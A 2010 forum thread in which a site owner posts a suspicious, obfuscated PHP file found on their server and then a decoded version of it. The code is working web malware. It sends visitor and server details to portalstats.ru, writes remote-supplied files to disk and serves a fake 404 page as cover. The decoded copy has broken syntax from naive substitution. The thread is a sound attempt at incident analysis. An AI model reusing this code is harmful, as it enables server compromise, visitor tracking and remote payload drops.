Decoding Suspicious PHP Contents

GamerZ · July 25, 2010, 11:01am

Hi all,

I have found this file entitled file.php in my server and I do not recall uploading this file. The content is suspicious. Anyway I can decode it?

<?php 

$x26="\\x65x\\160l\\x6f\\x64\\x65"; $x27="\\x66\\x63l\\x6f\\x73\\x65"; $x28="\\146e\\157\\146"; $x29="fop\\x65\\156"; $x2a="fso\\x63\\153\\157p\\145\\x6e"; $x2b="\\146p\\165t\\x73"; $x2c="\\146\\x72\\x65\\x61d"; $x2d="\\146\\167r\\x69\\164\\x65"; $x2e="\\x67\\145t\\150\\x6fst\\142y\\x6e\\141me"; $x2f="h\\x65a\\144e\\x72"; $x30="si\\172\\145\\x6f\\146"; $x31="soc\\x6b\\145\\x74\\x5f\\147\\145\\x74\\x5f\\x73t\\x61\\x74\\165\\x73"; $x32="\\x73t\\x72\\x6c\\145n"; $x33="\\x73tr\\145\\x61m\\137s\\x65t\\137\\164\\151\\155e\\157\\165\\x74"; $x34="st\\x72\\x70\\157s"; $x35="\\163ubs\\x74\\x72"; $x36="\\x74r\\x69\\155"; 

error_reporting(0);function x0b($x0b, $x0c){ global $x26,$x27,$x28,$x29,$x2a,$x2b,$x2c,$x2d,$x2e,$x2f,$x30,$x31,$x32,$x33,$x34,$x35,$x36; $x0d=$x29($x0b,"\\x77b\\053"); if ($x0d){$x2d($x0d,$x0c);$x27($x0d);}}function x0c(){ global $x26,$x27,$x28,$x29,$x2a,$x2b,$x2c,$x2d,$x2e,$x2f,$x30,$x31,$x32,$x33,$x34,$x35,$x36; $x2f('HTTP/1.1 404');print '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">';print "\
\\074\\x68\\164\\x6dl\\x3e\\074h\\145\\x61\\x64\\x3e\
<ti\\x74\\x6ce\\x3e\\x3404\\x20\\x4e\\x6f\\x74\\x20\\106o\\165\\156\\x64\\074\\x2ft\\x69\\164\\154e\\076\
\\074\\057\\150\\145a\\x64\\076\\x3cb\\x6f\\144\\x79\\076\
<h\\061>No\\x74\\040\\x46\\x6f\\x75n\\x64\\x3c\\x2fh\\061>\
<\\160>\\x54\\150\\145\\x20\\x72\\x65\\x71\\x75\\145s\\164\\145\\144\\x20\\x55\\122\\114\\x20\\167as\\040\\x6e\\x6ft\\x20\\146\\157u\\x6e\\x64\\040o\\x6e\\x20\\164\\150\\x69\\x73\\040s\\x65\\x72\\x76e\\x72\\056\\x3c\\057\\160\\x3e\
\\074\\x2f\\142od\\x79\\x3e\\074\\057h\\164m\\154>\
";}function x0d($x0e){ global $x26,$x27,$x28,$x29,$x2a,$x2b,$x2c,$x2d,$x2e,$x2f,$x30,$x31,$x32,$x33,$x34,$x35,$x36;  $x0f="\\r\
\\x2d\\x2d\\x37\\061\\101\\106\\062\\060\\x42\\1030\\060\\x46\\106\\x43\\101\\x3172D\\062\\r\
C\\157\\156t\\x65\\x6et-D\\x69s\\160\\157\\163\\151\\x74\\151\\x6f\\156\\072\\x20\\x66\\157\\x72\\155-d\\x61ta\\x3b\\040\\x6ea\\155\\145=\\"".$x0e."\\"\\r\
\\r\
"; return $x0f;}function x0e(){ global $x26,$x27,$x28,$x29,$x2a,$x2b,$x2c,$x2d,$x2e,$x2f,$x30,$x31,$x32,$x33,$x34,$x35,$x36;  $x10=2; $x11=""; if (isset($_SERVER['REMOTE_ADDR'])) { $x11.=x0d("\\x72\\x61\\x64"); $x11.=$_SERVER['REMOTE_ADDR']; } if (isset($_SERVER['REMOTE_PORT'])) { $x11.=x0d("\\x72\\x70\\157"); $x11.=$_SERVER['REMOTE_PORT']; } if (isset($_SERVER['SCRIPT_NAME'])) { $x11.=x0d("\\x73\\143\\x6e"); $x11.=$_SERVER['SCRIPT_NAME']; } if (isset($_SERVER['REQUEST_URI'])) { $x11.=x0d("\\x72u\\x72"); $x11.=$_SERVER['REQUEST_URI']; } if (isset($_SERVER['SERVER_ADDR'])) { $x11.=x0d("\\x73\\x61\\144"); $x11.=$_SERVER['SERVER_ADDR']; } if (isset($_SERVER['SERVER_NAME'])) { $x11.=x0d("\\163n\\141"); $x11.=$_SERVER['SERVER_NAME']; } if (isset($_SERVER['REQUEST_METHOD'])) { $x11.=x0d("\\162m\\x65"); $x11.=$_SERVER['REQUEST_METHOD']; } if (isset($_SERVER['QUERY_STRING'])) { $x11.=x0d("qs\\164"); $x11.=$_SERVER['QUERY_STRING']; } if (isset($_SERVER['DOCUMENT_ROOT'])) { $x11.=x0d("\\x64r\\157"); $x11.=$_SERVER['DOCUMENT_ROOT']; } if (isset($_SERVER['HTTP_HOST'])) { $x11.=x0d("\\x68h\\x6f"); $x11.=$_SERVER['HTTP_HOST']; } if (isset($_SERVER['HTTP_REFERER'])) { $x11.=x0d("\\x68\\x72\\145"); $x11.=$_SERVER['HTTP_REFERER']; } if (isset($_SERVER['HTTP_USER_AGENT'])) { $x11.=x0d("\\x68\\x75\\141"); $x11.=$_SERVER['HTTP_USER_AGENT']; } if (isset($_SERVER['SCRIPT_FILENAME'])) { $x11.=x0d("\\x73\\146\\156"); $x11.=$_SERVER['SCRIPT_FILENAME']; } if (isset($_SERVER['PHP_SELF'])) { $x11.=x0d("p\\x68\\x66"); $x11.=$_SERVER['PHP_SELF']; } $x11.=x0d("v\\x72m"); $x11.=$x10; $x11.="\\r\
-\\0557\\061\\x41F\\x32\\060\\x42C00\\x46\\x46\\x43\\x41\\0617\\x32\\104\\x32\\x2d\\055\\r\
"; return $x11;}function x0f($x12,$x13,$x14){ global $x26,$x27,$x28,$x29,$x2a,$x2b,$x2c,$x2d,$x2e,$x2f,$x30,$x31,$x32,$x33,$x34,$x35,$x36;  $x0c=""; $x11=x0e(); $x15=$x32($x11)-2; $x16="\\x50\\117\\x53\\124\\040".$x14." \\x48\\124\\x54\\120\\057\\061.\\x30\\r\
". "\\110o\\163\\164\\072 ".$x12."\\072".$x13."\\r\
". "\\125s\\145r\\055\\101\\147\\x65\\x6e\\164\\x3a\\x20\\x4d\\157\\172\\x69\\x6c\\x6ca\\057\\x34\\x2e\\x30 (\\143\\x6f\\155pa\\164\\x69\\142\\154e\\x3b \\115\\123I\\105 \\066\\0560\\x3b W\\x69n\\144\\157\\x77s\\x20\\x4eT\\x205.\\061;\\040SV\\x31\\073 \\056\\116E\\124 \\x43\\114\\122 1\\x2e1.4322)\\r\
". "C\\x6f\\156t\\145nt-T\\171p\\145\\072\\x20m\\x75\\x6ct\\151\\x70\\141rt/f\\157\\x72\\x6d-\\x64\\x61\\x74a;\\x20b\\x6f\\165\\156\\x64\\141r\\171\\0757\\061\\101\\106\\062\\x30\\x42\\x4300F\\106\\x43\\x41\\x317\\062\\104\\062\\r\
". "\\x43\\x6f\\156\\164\\145\\x6e\\x74-L\\x65\\x6e\\x67th: ".$x15."\\r\
"; $x0c=$x16.$x11; return $x0c;}function x10($x17,$x18,$x19){ global $x26,$x27,$x28,$x29,$x2a,$x2b,$x2c,$x2d,$x2e,$x2f,$x30,$x31,$x32,$x33,$x34,$x35,$x36; $x1a="\\055\\055\\x37\\061\\101F2\\060\\102C\\060\\060\\x41\\101\\101\\102"."\\102B\\107\\x47\\107\\106\\106CA\\x317\\062\\x442--"; $x1b=""; $x1c=""; $x1d=$x2e($x17); $x1e=$x2a($x1d,$x18,$x1b,$x1c,30); if(!$x1e) { return false; } $x0c=x0f($x17,$x18,$x19); $x2b($x1e,$x0c); $x1f=""; $x33($x1e,10); $x20=$x31($x1e); while(!$x28($x1e) && !$x20['timed_out']) {$x1f.=$x2c($x1e,1024);$x20=$x31($x1e); } $x27($x1e); $x21=$x34($x1f,"\\r\
\\r\
"); if($x21!==false) {$x22=$x35($x1f,0,$x21);$x11=$x35($x1f,$x21+4);list($x23,$x24,$x11) = $x26($x1a,$x11);if($x32($x23)>3000) if($x32($x24)>4) x0b($x24,$x23);$x22=$x26("\
",$x22);for($x25=0;$x25<$x30($x22);$x25++){$x22[$x25]=$x36($x22[$x25]);$x22[$x25].="\
";$x2f($x22[$x25]);}print $x11;return true; } else { return false; }}$x17="po\\x72\\164al\\163t\\x61\\x74\\163\\056\\162u";$x18="\\x380";$x19="\\057\\x63\\x6d\\x73l/\\160\\157w.p\\150p";if($_SERVER['REQUEST_METHOD']=='POST'){x0c();exit();}if(!x10($x17,$x18,$x19)){x0c();exit();}exit();

?>

GamerZ · July 25, 2010, 11:38am

Found the output:

<?php
$x26 = "explode";
$x27 = "fclose";
$x28 = "feof";
$x29 = "fopen";
$x2a = "fsockopen";
$x2b = "fputs";
$x2c = "fread";
$x2d = "fwrite";
$x2e = "gethostbyname";
$x2f = "header";
$x30 = "sizeof";
$x31 = "socket_get_status";
$x32 = "strlen";
$x33 = "stream_set_timeout";
$x34 = "strpos";
$x35 = "substr";
$x36 = "trim";
error_reporting(0);
function x0b($x0b, $x0c)
{
    global explode, fclose, feof, fopen, fsockopen, fputs, fread, fwrite, gethostbyname, header, sizeof, socket_get_status, strlen, stream_set_timeout, strpos, substr, trim;
    $x0d = fopen($x0b, "wb+");
    if ($x0d) {
        fwrite($x0d, $x0c);
        fclose($x0d);
    }
}
function x0c()
{
    global explode, fclose, feof, fopen, fsockopen, fputs, fread, fwrite, gethostbyname, header, sizeof, socket_get_status, strlen, stream_set_timeout, strpos, substr, trim;
    header('HTTP/1.1 404');
    print '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">';
    print "\
<html><head>\
<title>404 Not Found</title>\
</head><body>\
<h1>Not Found</h1>\
<p>The requested URL was not found on this server.</p>\
</body></html>\
";
}
function x0d($x0e)
{
    global explode, fclose, feof, fopen, fsockopen, fputs, fread, fwrite, gethostbyname, header, sizeof, socket_get_status, strlen, stream_set_timeout, strpos, substr, trim;
    $x0f = "\\r\
--71AF20BC00FFCA172D2\\r\
Content-Disposition: form-data; name=\\"" . $x0e . "\\"\\r\
\\r\
";
    return $x0f;
}
function x0e()
{
    global explode, fclose, feof, fopen, fsockopen, fputs, fread, fwrite, gethostbyname, header, sizeof, socket_get_status, strlen, stream_set_timeout, strpos, substr, trim;
    $x10 = 2;
    $x11 = "";
    if (isset($_SERVER['REMOTE_ADDR'])) {
        $x11 .= x0d("rad");
        $x11 .= $_SERVER['REMOTE_ADDR'];
    }
    if (isset($_SERVER['REMOTE_PORT'])) {
        $x11 .= x0d("rpo");
        $x11 .= $_SERVER['REMOTE_PORT'];
    }
    if (isset($_SERVER['SCRIPT_NAME'])) {
        $x11 .= x0d("scn");
        $x11 .= $_SERVER['SCRIPT_NAME'];
    }
    if (isset($_SERVER['REQUEST_URI'])) {
        $x11 .= x0d("rur");
        $x11 .= $_SERVER['REQUEST_URI'];
    }
    if (isset($_SERVER['SERVER_ADDR'])) {
        $x11 .= x0d("sad");
        $x11 .= $_SERVER['SERVER_ADDR'];
    }
    if (isset($_SERVER['SERVER_NAME'])) {
        $x11 .= x0d("sna");
        $x11 .= $_SERVER['SERVER_NAME'];
    }
    if (isset($_SERVER['REQUEST_METHOD'])) {
        $x11 .= x0d("rme");
        $x11 .= $_SERVER['REQUEST_METHOD'];
    }
    if (isset($_SERVER['QUERY_STRING'])) {
        $x11 .= x0d("qst");
        $x11 .= $_SERVER['QUERY_STRING'];
    }
    if (isset($_SERVER['DOCUMENT_ROOT'])) {
        $x11 .= x0d("dro");
        $x11 .= $_SERVER['DOCUMENT_ROOT'];
    }
    if (isset($_SERVER['HTTP_HOST'])) {
        $x11 .= x0d("hho");
        $x11 .= $_SERVER['HTTP_HOST'];
    }
    if (isset($_SERVER['HTTP_REFERER'])) {
        $x11 .= x0d("hre");
        $x11 .= $_SERVER['HTTP_REFERER'];
    }
    if (isset($_SERVER['HTTP_USER_AGENT'])) {
        $x11 .= x0d("hua");
        $x11 .= $_SERVER['HTTP_USER_AGENT'];
    }
    if (isset($_SERVER['SCRIPT_FILENAME'])) {
        $x11 .= x0d("sfn");
        $x11 .= $_SERVER['SCRIPT_FILENAME'];
    }
    $x11 .= x0d("vrm");
    $x11 .= $x10;
    $x11 .= "\\r\
--71AF20BC00FFCA172D2--\\r\
";
    return $x11;
}
function x0f($x12, $x13, $x14)
{
    global explode, fclose, feof, fopen, fsockopen, fputs, fread, fwrite, gethostbyname, header, sizeof, socket_get_status, strlen, stream_set_timeout, strpos, substr, trim;
    $x0c = "";
    $x11 = x0e();
    $x15 = strlen($x11) - 2;
    $x16 = "POST " . $x14 . " HTTP/1.0\\r\
" . "Host: " . $x12 . ":" . $x13 . "\\r\
" . "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)\\r\
" . "Content-Type: multipart/form-data; boundary=71AF20BC00FFCA172D2\\r\
" . "Content-Length: " . $x15 . "\\r\
";
    $x0c = $x16 . $x11;
    return $x0c;
}
function x10(portalstats.ru, 80, /cmsl/pow.php)
{
    global explode, fclose, feof, fopen, fsockopen, fputs, fread, fwrite, gethostbyname, header, sizeof, socket_get_status, strlen, stream_set_timeout, strpos, substr, trim;
    $x1a = "--71AF20BC00AAAB" . "BBGGGFFCA172D2--";
    $x1b = "";
    $x1c = "";
    $x1d = gethostbyname(portalstats.ru);
    $x1e = fsockopen(gethostbyname(portalstats.ru), 80, "", "", 30);
    if (!fsockopen(gethostbyname(portalstats.ru), 80, "", "", 30)) {
        return false;
    }
    $x0c = x0f(portalstats.ru, 80, /cmsl/pow.php);
    fputs(fsockopen(gethostbyname(portalstats.ru), 80, "", "", 30), $x0c);
    $x1f = "";
    stream_set_timeout(fsockopen(gethostbyname(portalstats.ru), 80, "", "", 30), 10);
    $x20 = socket_get_status(fsockopen(gethostbyname(portalstats.ru), 80, "", "", 30));
    while (!feof(fsockopen(gethostbyname(portalstats.ru), 80, "", "", 30)) && !$x20['timed_out']) {
        $x1f .= fread(fsockopen(gethostbyname(portalstats.ru), 80, "", "", 30), 1024);
        $x20 = socket_get_status(fsockopen(gethostbyname(portalstats.ru), 80, "", "", 30));
    }
    fclose(fsockopen(gethostbyname(portalstats.ru), 80, "", "", 30));
    $x21 = strpos($x1f, "\\r\
\\r\
");
    if ($x21 !== false) {
        $x22 = substr($x1f, 0, $x21);
        $x11 = substr($x1f, $x21 + 4);
        list($x23, $x24, $x11) = explode($x1a, $x11);
        if (strlen($x23) > 3000)
            if (strlen($x24) > 4)
                x0b($x24, $x23);
        $x22 = explode("\
", $x22);
        for ($x25 = 0; $x25 < sizeof($x22); $x25++) {
            $x22[$x25] = trim($x22[$x25]);
            $x22[$x25] .= "\
";
            header($x22[$x25]);
        }
        print $x11;
        return true;
    } else {
        return false;
    }
}
$x17 = "portalstats.ru";
$x18 = "80";
$x19 = "/cmsl/pow.php";
if ($_SERVER['REQUEST_METHOD'] == 'POST') {
    x0c();
    exit();
}
if (!x10(portalstats.ru, 80, /cmsl/pow.php)) {
    x0c();
    exit();
}
exit();
?>